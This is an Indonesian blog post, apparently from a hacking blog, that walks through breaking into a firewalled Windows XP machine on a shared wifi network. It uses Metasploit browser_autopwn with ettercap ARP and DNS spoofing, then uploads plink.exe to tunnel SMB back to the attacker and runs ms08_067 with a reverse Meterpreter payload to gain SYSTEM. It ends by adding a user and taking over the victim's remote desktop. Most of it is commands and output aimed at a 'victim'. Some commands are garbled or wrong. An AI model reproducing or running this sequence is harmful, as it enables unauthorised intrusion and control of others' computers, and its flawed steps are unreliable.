Metasploit Bypass Firewall

Hehe.. Jangan bosen-bosennya membaca post dari saya ya? Kali ini saya mau sharing metasploit.. Memang mudah mengeksploit Windows XP Service Pack 2 tanpa firewall.. Tapi kalo dipasang firewall?? Lalu gimana jika korban ternyata bukan seorang administrator, dimana privilege nya sangat terbatas?? Saya akan beritau caranya, tutorial ini akan panjang, jadi sarankan jika ingin membaca tutorial ini, siapkan secangkir kopi dan sebatang rokok..

Briefing:
Pastikan anda memiliki program ini:
1. nmap
2. metasploit
3. ettercap

Tutorial:
Hal penting yang harus diketahui adalah menyadari bahwa korban menggunakan firewall, sehingga membatasi perintah ping dari luar, bagaimana cara mengetahuinya?

Buka terminal, lalu ketik


Code:
nmap [IP address korban]

Contoh, korban memiliki IP address 192.168.1.10, maka perintahnya adalah:
Code:
nmap 192.168.1.10

Jika korban memang menggunakan firewall, maka outputnya akan tampak seperti ini
Code:
All 1000 scanned ports on 192.168.1.10 are filtered

Dalam kasus seperti ini, anda tidak dapat menggunakan exploit standar
Code:
exploit/windows/smb/ms08_067_netapi

Karena hasilnya akan nihil, karena koneksi ditolak oleh firewall. Lalu, bagaimana cara melewati firewall ini??

Buka metasploit kamu:


root@red-dragon:/# cd /pentest/exploits/framework2/
root@red-dragon:/pentest/exploits/framework2# ./msfconsole 

Kemudian gunakan auxiliary browser_autopwn


msf > use auxiliary/server/browser_autopwn
msf  auxiliary(browser_autopwn) > show options
Kemudian atur auxiliary kamu.
msf  auxiliary(browser_autopwn) > set LHOST [ip address kamu]
msf  auxiliary(browser_autopwn) > set SRVHOST [ip address kamu]
msf  auxiliary(browser_autopwn) > set SRVPORT 80
msf  auxiliary(browser_autopwn) > set URIPATH /

Terakhir, jalankan auxiliary kamu.
msf  auxiliary(browser_autopwn) > exploit -j

Tunggu sampai semua exploit dan payload berhasil di siapkan, kemudian kita akan bermain ke jaringan.

Menunggu memang membosankan, jadi lebih baik kita routing koneksi korban ke IP address kita. Perlu diketahui, auxiliary/server/browser_autopwn akan bereaksi jika korban mengakses IP address kita melalui browser internet. Ini akan memperkecil peluang eksploitasi, untuk itu daripada menunggu tanpa kepastian, lebih baik membuat kepastian. Gunakan dns_spoofing ettercap. :)

Sebelum memulai spoofing dns, kita harus mengatur ulang konfigurasi dns. Caranya, buka terminal, lalu ketik:
Code:
root@red-dragon:/# gedit /usr/share/ettercap/etter.dns

Hapus semua, dan masukan
Code:
* A [IP address kamu]
Jika IP address kamu 192.168.1.2, maka
Code:
* A 192.168.1.2

Simpan konfigurasi, kemudian eksekusi spoofing dns menggunakan ettercap.
Code:
root@red-dragon:/# ettercap -i [interface] [option] /target 1/ /target 2/

Dalam kasus ini, saya berada di wifi area, IP address korban 192.168.1.10, dan IP address access poin 192.168.1.1
Maka.
- Interface = wlan0
- target 1 = 192.168.1.1
- target 2 = 192.168.1.10


Masukan perintah ini ke dalam terminal:
Code:
root@red-dragon:/# ettercap -i wlan0 -T -q -P dns_spoof -M ARP-REMOTE /192.168.1.1/ /192.168.1.10/

Dengan ini, alamat apapun yang korban masukan di address bar akan menjadi ----> 192.168.1.2 alias IP address kita. Dengan ini, metasploit akan bereaksi terhadap klien yang mengakses IP address kita melalui browser internetnya.

Perhatikan output metasploit:

[*] request '/' from 192.168.1.10:1809
[*] request '/?essid=xxxxxxxxxxxxxx' from 192.168.1.10:1809
[*] responding with exploits
[*] ending internet explorer COM CreateObject Code Execution exploit HTML to 192.168.1.10:1809
[*] sending EXE payload to 192.168.1.10:1809
[*] sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.1.2:3333 -> 192.168.1.10:1809)


Memasuki tahap meterpreter dalam komputer yang tidak memiliki akses khusus layaknya administrator tidaklah terlalu menyenangkan. Selain hak yang dibatasi, tidak akan ada banyak perintah yang berfungsi dalam command prompt. Untuk mengangkat privilege, kita harus masuk ke sesi meterpreter terlebih dahulu. Masukan perintah ini di dalam metasploit:
Code:
msf  auxiliary(browser_autopwn) > session -i l

Ini berfungsi untuk berinteraksi dengan meterpreter sesi pertama.


meterpreter > getuid

Outpunya:
user

Ini menunjukan bahwa pengguna bernama user.

meterpreter > shell
C:\Documents and Settings\user\Desktop> net user stdio stdio /add

Perintah ini akan gagal diekseksi, karena pengguna tidak menjalankan komputer atau leptopnya atas nama administrator. Jika bagini, kita membutuhkan software jahat yang disediakan backtrack untuk mengubah user menjadi administrator.

C:\Documents and Settings\user\Desktop> netstat -an
Perhatikan port 445 yang terbuka dalam network status. Kemudian kita kembali lagi pada sesi meterpreter, untuk mengupload program jahat.

C:\Documents and Settings\user\Desktop>exit
meterpreter > upload /pentest/windows-binaries/tools/plink.exe "C:\\documents and settings\user\desktop\\"
Jika upload berhasil, langkah selanjutnya adalah kembali lagi ke command prompt untuk mengeksekusi program jahat tersebut.
meterpreter > shell
C:\Documents and Settings\user\Desktop>plink.exe -l [username] -pw [password] -R port:localhost:port [ip address kamu]


Contoh dalam kasus ini, saya ingin username saya root, dan password toor, dengan port 445 yang terbuka, dan IP local host 127.0.0.1 dan ip address saya 192.168.1.2 maka:
-l = root
-pw = toor
ip address = 192.168.1.2

Jadi masukan perintah ini:

C:\Documents and Settings\user\Desktop>pling.exe -l root -pw toor -R 445:127.0.0.1:445 192.168.1.2

Buka terminal baru dan ketik:

root@red-dragon:~# netstat -antp |grep 445

Jika 127.0.0.1ada dalam daftar, maka kita siap melakukan exploitasi tahap kedua. Masukan perintah berikut:
./pentest/exploits/framework3/msfconsole
Code:
msf > use exploit/windows/smb/ms08_067_netapi
Code:
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
Code:
msf exploit(
ms08_067_netapi) > set LHOST 192.168.1.2
Code:
msf exploit(
ms08_067_netapi) > set RHOST 127.0.01
Code:
msf exploit(
ms08_067_netapi) > set RPORT 445
Code:
msf exploit(
ms08_067_netapi) > exploit -j

OUTPUT:
[*]Started reverse handler on 192.168.1.2:4444
[*]Automatically detecting the taget..
[*]Fingerprint: Windows XP Service Pack 2 - lang:English
[*]Selected Target: Windows XP SP 2 English (NX)
[*]Triggering the vulnerability...
[*]Sending stage (748032 bytes)
[*]Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.10:1809)

meterpreter >

Pada meterpreter ini, kita akan menguji apakah kita sudah menjadi administrator atau belum:
Masukan kode berikut:

Code:
meterpreter > getuid

Jika kita sudah menjadi administrator, maka outputnya akan tampak seperti ini:
Code:
meterpreter > NT AUTHORITY\SYSTEM

Cukupkah? Saya rasa belum jika kita belum meremote desktop korban. Perlu diingat bahwa koneksi VNC (Program untuk remote desktop) berjalan di port 3389. Kembali kita gunakan tplink.exe


meterpreter > shell
C:\WINDOWS\system32>cd c:\documents and settings\user\desktop
C:\Documents and Settings/user/Desktop> net stdio stdio /add
C:\Documents and Settings/user/Desktop> C:
C:\tplink.exe -l root -pw toor 3389:127.0.0.1:3389 192.168.1.2


Untuk meremote desktop korban, kita hanya perlu mengeksekusi rdesktop. Buka terminal baru, lalu masukan perintah:
Code:
rdesktop 127.0.01

Untuk Username, masukan root.
Dan untuk password, masukan toor.

GAME OVER. Desktop sudah kamu kendalikan. Keyboard, dan mouse ada dalam kuasa kita.


Memberal_Force
Powered by: Metasploit ettercap blue-dragon
Src       : http://double-dragon.blogspot.com
 
Share on Google Plus

About Unknown

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment

0 komentar :

Post a Comment

Silahkan Ber-Komentar bro.. :)
SOPAN WAJIB !!